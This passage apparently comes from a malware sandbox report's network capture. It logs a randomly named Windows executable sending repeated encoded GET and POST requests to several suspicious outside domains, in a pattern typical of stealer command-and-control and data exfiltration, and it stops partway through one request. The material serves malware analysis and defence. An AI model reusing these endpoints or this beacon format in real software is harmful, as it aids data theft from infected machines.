                                              Jul 1, 2024 16:18:09.884064913 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:09.884154081 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.886069059 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.890916109 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.806495905 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.806607962 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.808104992 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:11.391294003 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.410413027 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.415347099 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:12.415458918 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.417527914 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.422604084 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:12.422661066 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333486080 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333591938 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333646059 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:13.922626019 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:19:02.626677036 CEST1.1.1.1192.168.2.50xa48fNo error (0)www.coinmao.com192.227.175.142A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:19:16.237375975 CEST1.1.1.1192.168.2.50x45f3No error (0)www.genesiestudios.onlinegenesiestudios.onlineCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:19:16.237375975 CEST1.1.1.1192.168.2.50x45f3No error (0)genesiestudios.online31.186.11.254A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49722 | 122.10.13.122 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:15:49.808805943 CEST | 524 | OUT | GET /ndq7/?3hkl=slNhbLXpBjO8vl&4dV43tA=OxZKnWuwsJOrHHhSr0WAKMos2ZEDKwJVMtvq3iaqcpp4OrE8YxBQJzvCfYPSu8gmodsQI/gccX7lRSYJm35OlpLbr+Emqb863it5vTM6q/0fJzxBvxXG8nRUn7++wRvQdA== HTTP/1.1
                                              Host: www.tcqlk.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 1, 2024 16:16:06.168265104 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49727 | 109.123.121.243 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:11.211714983 CEST | 779 | OUT | POST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=wsM13RFhpuNB51xUpYYuB4rHo90HS2iq1amMceMKz4v7ehSWQEQtU6tAvQQx1s56+EBpsIMgzVGKbZcKGUYE3FDC9i/q6SDGqCm8JV+kM7ddIZYBdrE2mtPMeb9BVkE+2KmyuT5K4Ut96yaIX2eT60+a2Piqv3lBHogvITH/GtQsExNLDCzzsCa10+PazWByNpcIA/s=
Jul 1, 2024 16:16:11.813142061 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:11 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49728 | 109.123.121.243 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:13.746309042 CEST | 799 | OUT | POST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=wsM13RFhpuNB4VBUv/suK4rI0t0HdWjC1aiMcbhPzLL7dBiWTFQtZatA3gR6o85P+EMcsKIgzVSKbcgKGHgH2VDEwC/o0yDGqCm8JVqCM7VdIpoBcKE5vNPPZb9BC0FW2KmbuXwt4WV96wyIWk2Sx0+c8vjYvF4VeOQcCyz3S7YvBHghZg7b/i2NktHtimgbXKM4eo5c/LlgiGYBAi2yQXiRlFQY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49729 | 109.123.121.243 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:16.277179956 CEST | 1816 | OUT | POST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 1, 2024 16:16:16.870628119 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:16 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49731 | 109.123.121.243 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:18.808053017 CEST | 527 | OUT | GET /hpa2/?4dV43tA=9ukV0lom1Pkt5UJj/K4lBand6ck4dRKkyq6RFoVD1IbXcSjkOX57QIVSlkgD3OdjwHZgiaAyrGOMfaVTdV8W+y7+gTzt+hDR2BCzfmmCLLxuXIcFaZwChPWJYJEFenE0lA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 1, 2024 16:16:19.403414011 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49733 | 47.242.109.15 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:24.966593027 CEST | 776 | OUT | POST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=H3smHWG9wmfUh+Do90DWL7ynrtJP75tLqaRB3V8swd40HzVtVnksbbmtI6+5UihSjtKIV1crWVah0Lju2AKKAVyo8zl5eJuupNvVrDgTYfitByZiPMAVJx2GTYPOQqMGv+YvhJROzWgm4IQCy8+9k1Jx9GeLWkaQwhlv2X4yEtNjYDZNCBfqkpVKmikJ1zh/s37TBEo=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49734 | 47.242.109.15 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:27.495388985 CEST | 796 | OUT | POST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=H3smHWG9wmfUgdro/X7WaLyk39JPxZtPqadB3REawOQ0GWptUjIsYbmtDa+4KShJjtH9V0grWT2h0OHu2xKNPlyu3Tl/BZuupNvVrDk5YfKtBCpiIZ0WSR2HSYPOUqMCv+YdhIMbzT8m4N0Cxoq69FJ7gWf0f2XL0CV2rWxOf79qQV0nYjXC3J5y2xs+kDAW2UrjfT9A6+InJ+C3Os2a9hIP52GH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49736 | 47.242.109.15 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:30.028462887 CEST | 1813 | OUT | POST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49737 | 47.242.109.15 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:32.561088085 CEST | 526 | OUT | GET /pyns/?3hkl=slNhbLXpBjO8vl&4dV43tA=K1EGEj+kimjFg9LR9EnSE5iA5qZu36FTtfUVuSlzoP8oPxhtdzERerS5Mp6fVz5Cq8+DdWETSgOpnIOU0gSGOk+1pkQ/H5TXrv7e3gEZftLrUi5jR50/YQGYV+ODUfVL1g== HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49739 | 121.254.178.238 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 16:16:59.555818081 CEST | 782 | OUT | POST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=amYji3EqclQQh/+vc6pJgX+wEeY8ZK2sRvin1la0nwg0SndsYaseGm2RF3cViqXA6o9P2o43k7ePPYcJp8bPyu0kTxvby2hTcGCcMkh875nT61Ki17nugQ50uL2n3W62E9AwNWuFKtIyqGtUIvH86AehJwMM+ryG4CIQ1hotAICsDkkIE9olnt21sCNnJASVFT6AlEA=
                                              Jul 1, 2024 16:17:00.505011082 CEST  367                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:00 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              10          192.168.2.5  49740        121.254.178.238  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:02.095932007 CEST  802                OUT        POST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=amYji3EqclQQgfOvQ5RJm3+3duY8Wq2oRvun1kfzgGQ0cjZsZe4eTm2RKXcQtKX16ohx2p03k4iPPaEJpPjMgu0mVxvV22hTcGCcMk1G74PT6F6i1fzt+g51tL2ngG6yE9AWNUavKvwyqHdUP8f/0AerXANQu+WMxDUu0DR4T/nXPyJiefgN0NaN8RFQYwz8fwqw7TVvTDWE4KCTeP7YS+ZWkSPG
                                              Jul 1, 2024 16:17:03.025872946 CEST  367                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:03 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              11          192.168.2.5  49741        121.254.178.238  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:04.641969919 CEST  1819               OUT        POST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA= [TRUNCATED]
                                              Jul 1, 2024 16:17:05.573576927 CEST  367                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:05 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              12          192.168.2.5  49742        121.254.178.238  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:07.337584972 CEST  528                OUT        GET /vjxp/?4dV43tA=XkwDhAosLmY8qOGkJKM7nBqGXPMJWqSVPKG+tEu7tnkRRA5qaKsxdm3QH0407PDb0a9c/bEAso+GP5FSns/F0pcfHDqX+WZ2QlqXVXtujZTwrVOl6ODb0zZvjrqBrFnJXw==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:08.265718937 CEST  367                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:08 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              13          192.168.2.5  49743        203.161.62.199   80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:13.324881077 CEST  788                OUT        POST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=x/2kJ5BSQ8VrG/NLCo1xTX95QBoZojl9133VQNk5TD5X8HqBMDfMIXaKqsJgDTEHvGx0fYR0Gu1z4wK7LyHpqItFRbqleeWqeXQzca56scVV+PKvr7a/lNXzFqWA/eUpNrdZLKM5fFgQBrL/NCJxae1jkCdEIRY5qorIJrucAwyofxp5HiVzQOD6Tq15eQpQjOkzZw8=
                                              Jul 1, 2024 16:17:13.934170961 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:13 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              14          192.168.2.5  49744        203.161.62.199   80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:15.863521099 CEST  808                OUT        POST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=x/2kJ5BSQ8VrGf9LOp1xbX9+ehoZmDl513LVQMhkT1hX8maBeCfMLXaKycJlOzEIvG9WfZt0Gqdz40C7Lgv2rYtHZ7qnQ+WqeXQzcatAscNV+/avk+u8mNXySaWA1OVuNrdBLLBcfHIQBq7/KTJyAO1hgCcNYC9phYbKKaSBYi6NXnETdAdbDuvCD59OPgI55t0DHnpIxdaWfYCXmoD8oRMeo9Vc
                                              Jul 1, 2024 16:17:16.489027023 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:16 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              15          192.168.2.5  49745        203.161.62.199   80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:18.403979063 CEST  1825               OUT        POST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA= [TRUNCATED]
                                              Jul 1, 2024 16:17:18.997564077 CEST  533                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:18 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              16          192.168.2.5  49746        203.161.62.199   80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:20.934300900 CEST  530                OUT        GET /gb2c/?3hkl=slNhbLXpBjO8vl&4dV43tA=89eEKNhTAfJ0K+ZNbo8QYk1fUSoEpApn1wnFOcVuW0oI5H3wAhPaJlWMgeBIfmA5pU1pUK0VAPZu7D3VTgjehpZPLbfme/O2eAoCBbtXgeZInoaphOuGkqvoaLKQybRjQA== HTTP/1.1
                                              Host: www.quantumvoil.xyz
